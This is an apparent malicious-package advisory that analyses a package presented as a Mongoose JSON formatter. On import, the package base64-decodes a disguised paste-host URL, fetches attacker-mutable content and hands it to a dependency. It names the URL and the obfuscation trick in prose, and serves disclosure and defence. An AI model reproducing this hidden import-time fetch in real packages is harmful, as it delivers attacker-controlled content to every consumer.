MAL-2026-6499

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (2a3dc63cdceb40d6f0fe338bcdbe589689ab2897f44cbb6b7c3d0192b5bd09c5) On require(), helpers.js instantiates a Helper whose constructor invokes createLog(). createLog() base64-decodes the string assigned to HASH_KEY (decoding to https://www.jsonkeeper.com/b/XVHGD, an anonymous mutable JSON paste host), fetches that URL, and passes the response body's `data.data` field as `threadContent` to createLogger() from the `log-format-thread` dependency. The package's advertised purpose is formatting Mongoose JSON output; there is no legitimate reason for it to retrieve content from a paste host at import time. The URL is hidden via base64 and given the misleading name HASH_KEY. Because jsonkeeper.com content is attacker-mutable and the fetched bytes are handed to a dependency for processing, any consumer that require()s this package becomes a vehicle for arbitrary attacker-controlled content delivered at import time.